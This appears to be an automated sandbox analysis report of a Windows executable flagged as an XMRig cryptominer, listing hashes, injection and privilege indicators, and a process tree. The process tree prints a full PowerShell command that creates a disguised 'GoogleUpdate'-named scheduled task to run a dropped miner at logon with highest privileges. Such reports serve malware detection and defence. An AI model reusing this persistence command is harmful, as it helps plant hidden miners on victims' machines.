Analysis
- max time kernel: 150s
- max time network: 151s
- platform: windows10-2004_x64
- resource: win10v2004-20241007-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 27/10/2024, 15:34
Static task: static1
Behavioral task: behavioral1
Sample: 3b567592754e25eaa9246e3b267eebccaa870494c351b87ce2124f3e03a676aa.exe
Resource: win7-20240903-en
General
- Target: 3b567592754e25eaa9246e3b267eebccaa870494c351b87ce2124f3e03a676aa.exe
- Size: 9.8MB
- MD5: 6f804d98df32ee28685d8468e619dd87
- SHA1: cc4813865c1600e7c7b772d692a37dd752a7cc6a
- SHA256: 3b567592754e25eaa9246e3b267eebccaa870494c351b87ce2124f3e03a676aa
- SHA512: af1280f4db7b70f9a94f20837258a5a6ca7cbbe1a4cc44d0b938a10290496802793d631e4cce155597dfc05243624013750310a2baf260c085f29316682d37c4
- SSDEEP: 196608:NfZ+pJEfu095vo5n8xnzv0jr+ao/hNJu+y19RERUAc9s:Nsx09xo5m70nm5NJuVRERUAY
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
description | pid | Process | procid_target
PID 5100 created 3544 | 5100 | 3b567592754e25eaa9246e3b267eebccaa870494c351b87ce2124f3e03a676aa.exe | 56
PID 5100 created 3544 | 5100 | 3b567592754e25eaa9246e3b267eebccaa870494c351b87ce2124f3e03a676aa.exe | 56
PID 3772 created 3544 | 3772 | uwpdater.exe | 56
PID 3772 created 3544 | 3772 | uwpdater.exe | 56
PID 3772 created 3544 | 3772 | uwpdater.exe | 56
Xmrig family
-
XMRig Miner payload 15 IoCs
resource | yara_rule
behavioral2/memory/3772-41-0x00007FF747B80000-0x00007FF748549000-memory.dmp | xmrig
behavioral2/memory/1628-44-0x00007FF7C1660000-0x00007FF7C1E4F000-memory.dmp | xmrig
behavioral2/memory/1628-46-0x00007FF7C1660000-0x00007FF7C1E4F000-memory.dmp | xmrig
behavioral2/memory/1628-48-0x00007FF7C1660000-0x00007FF7C1E4F000-memory.dmp | xmrig
behavioral2/memory/1628-50-0x00007FF7C1660000-0x00007FF7C1E4F000-memory.dmp | xmrig
behavioral2/memory/1628-52-0x00007FF7C1660000-0x00007FF7C1E4F000-memory.dmp | xmrig
behavioral2/memory/1628-54-0x00007FF7C1660000-0x00007FF7C1E4F000-memory.dmp | xmrig
behavioral2/memory/1628-56-0x00007FF7C1660000-0x00007FF7C1E4F000-memory.dmp | xmrig
behavioral2/memory/1628-58-0x00007FF7C1660000-0x00007FF7C1E4F000-memory.dmp | xmrig
behavioral2/memory/1628-60-0x00007FF7C1660000-0x00007FF7C1E4F000-memory.dmp | xmrig
behavioral2/memory/1628-62-0x00007FF7C1660000-0x00007FF7C1E4F000-memory.dmp | xmrig
behavioral2/memory/1628-64-0x00007FF7C1660000-0x00007FF7C1E4F000-memory.dmp | xmrig
behavioral2/memory/1628-66-0x00007FF7C1660000-0x00007FF7C1E4F000-memory.dmp | xmrig
behavioral2/memory/1628-68-0x00007FF7C1660000-0x00007FF7C1E4F000-memory.dmp | xmrig
behavioral2/memory/1628-70-0x00007FF7C1660000-0x00007FF7C1E4F000-memory.dmp | xmrig
Executes dropped EXE 1 IoCs
pid | Process
3772 | uwpdater.exe
Command and Scripting Interpreter: PowerShell
pid | Process
2972 | powershell.exe
1860 | powershell.exe
Suspicious use of SetThreadContext 2 IoCs
description | pid | Process | procid_target
PID 3772 set thread context of 4140 | 3772 | uwpdater.exe | 104
PID 3772 set thread context of 1628 | 3772 | uwpdater.exe | 105
Suspicious behavior: EnumeratesProcesses 14 IoCs
pid | Process
5100 | 3b567592754e25eaa9246e3b267eebccaa870494c351b87ce2124f3e03a676aa.exe
5100 | 3b567592754e25eaa9246e3b267eebccaa870494c351b87ce2124f3e03a676aa.exe
2972 | powershell.exe
2972 | powershell.exe
5100 | 3b567592754e25eaa9246e3b267eebccaa870494c351b87ce2124f3e03a676aa.exe
5100 | 3b567592754e25eaa9246e3b267eebccaa870494c351b87ce2124f3e03a676aa.exe
3772 | uwpdater.exe
3772 | uwpdater.exe
1860 | powershell.exe
1860 | powershell.exe
3772 | uwpdater.exe
3772 | uwpdater.exe
3772 | uwpdater.exe
3772 | uwpdater.exe
Suspicious use of AdjustPrivilegeToken 64 IoCs
description | pid | Process
All 64 entries are pid 2972, powershell.exe. The first entry is Token: SeDebugPrivilege; the following 21-token sequence is then recorded three times in a row (63 entries):
Token: SeIncreaseQuotaPrivilege | 2972 | powershell.exe
Token: SeSecurityPrivilege | 2972 | powershell.exe
Token: SeTakeOwnershipPrivilege | 2972 | powershell.exe
Token: SeLoadDriverPrivilege | 2972 | powershell.exe
Token: SeSystemProfilePrivilege | 2972 | powershell.exe
Token: SeSystemtimePrivilege | 2972 | powershell.exe
Token: SeProfSingleProcessPrivilege | 2972 | powershell.exe
Token: SeIncBasePriorityPrivilege | 2972 | powershell.exe
Token: SeCreatePagefilePrivilege | 2972 | powershell.exe
Token: SeBackupPrivilege | 2972 | powershell.exe
Token: SeRestorePrivilege | 2972 | powershell.exe
Token: SeShutdownPrivilege | 2972 | powershell.exe
Token: SeDebugPrivilege | 2972 | powershell.exe
Token: SeSystemEnvironmentPrivilege | 2972 | powershell.exe
Token: SeRemoteShutdownPrivilege | 2972 | powershell.exe
Token: SeUndockPrivilege | 2972 | powershell.exe
Token: SeManageVolumePrivilege | 2972 | powershell.exe
Token: 33 | 2972 | powershell.exe
Token: 34 | 2972 | powershell.exe
Token: 35 | 2972 | powershell.exe
Token: 36 | 2972 | powershell.exe
Suspicious use of FindShellTrayWindow 64 IoCs
pid | Process
1628 | explorer.exe (64 identical entries)
Suspicious use of SendNotifyMessage 64 IoCs
pid | Process
1628 | explorer.exe (64 identical entries)
Suspicious use of WriteProcessMemory 2 IoCs
description | pid | Process | procid_target
PID 3772 wrote to memory of 4140 | 3772 | uwpdater.exe | 104
PID 3772 wrote to memory of 1628 | 3772 | uwpdater.exe | 105
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
- C:\Windows\Explorer.EXE (depth 1, PID 3544)
  Command line: C:\Windows\Explorer.EXE
  - C:\Users\Admin\AppData\Local\Temp\3b567592754e25eaa9246e3b267eebccaa870494c351b87ce2124f3e03a676aa.exe (depth 2, PID 5100)
    Command line: "C:\Users\Admin\AppData\Local\Temp\3b567592754e25eaa9246e3b267eebccaa870494c351b87ce2124f3e03a676aa.exe"
    Signatures:
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Suspicious behavior: EnumeratesProcesses
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 2, PID 2972)
    Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wczaqphd#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTwaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Gowogle\Chwrome\uwpdater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Gowogle\Chwrome\uwpdater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTwaskMachineQC' -RunLevel 'Highest' -Force; }
    Signatures:
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\System32\schtasks.exe (depth 2, PID 3012)
    Command line: C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTwaskMachineQC"
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 2, PID 1860)
    Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wczaqphd#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTwaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Gowogle\Chwrome\uwpdater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Gowogle\Chwrome\uwpdater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTwaskMachineQC' -RunLevel 'Highest' -Force; }
    Signatures:
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
  - C:\Windows\System32\conhost.exe (depth 2, PID 4140)
    Command line: C:\Windows\System32\conhost.exe
  - C:\Windows\explorer.exe (depth 2, PID 1628)
    Command line: C:\Windows\explorer.exe
    Signatures:
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
- C:\Users\Admin\AppData\Roaming\Gowogle\Chwrome\uwpdater.exe (depth 1, PID 3772)
  Command line: C:\Users\Admin\AppData\Roaming\Gowogle\Chwrome\uwpdater.exe
  Signatures:
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 3KB
  MD5: c95fe14a860e918a98d24f0f368b1c43
  SHA1: 69c8cdb324ffa35c638a9ca9e4231375af22a380
  SHA256: b611743d7be3e9f89db1d97a71ed2ee2efcc02df0d824078ff7be6f78a0bb7f3
  SHA512: 6e8dcf392ebdab756016c82db7aa3bd920b26eb18b049d4d2980101bc34bf2d096003168c9853997e1d0683575668050c485acacf1fce8cb6054e8fc018b7fef
- Filesize: 1KB
  MD5: 41cef186d2a39342aa7c2ea5d68be3db
  SHA1: 6dae6036aa50b0b7ea4167cafd6942f40dbcd582
  SHA256: 36c3843d76c1bdbf139301f7a9ad852fa507341445e394d14415c388b6dafe37
  SHA512: 7151b1f2feeac776efface71c4f128bc1eec2873ad87d851b44d3f7d987cd0fe8f82fc7eaa571a5ef0d55f8378959dab055539ff1ff573a23d776f04e22b3f38
- Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
- Filesize: 9.8MB
  MD5: 6f804d98df32ee28685d8468e619dd87
  SHA1: cc4813865c1600e7c7b772d692a37dd752a7cc6a
  SHA256: 3b567592754e25eaa9246e3b267eebccaa870494c351b87ce2124f3e03a676aa
  SHA512: af1280f4db7b70f9a94f20837258a5a6ca7cbbe1a4cc44d0b938a10290496802793d631e4cce155597dfc05243624013750310a2baf260c085f29316682d37c4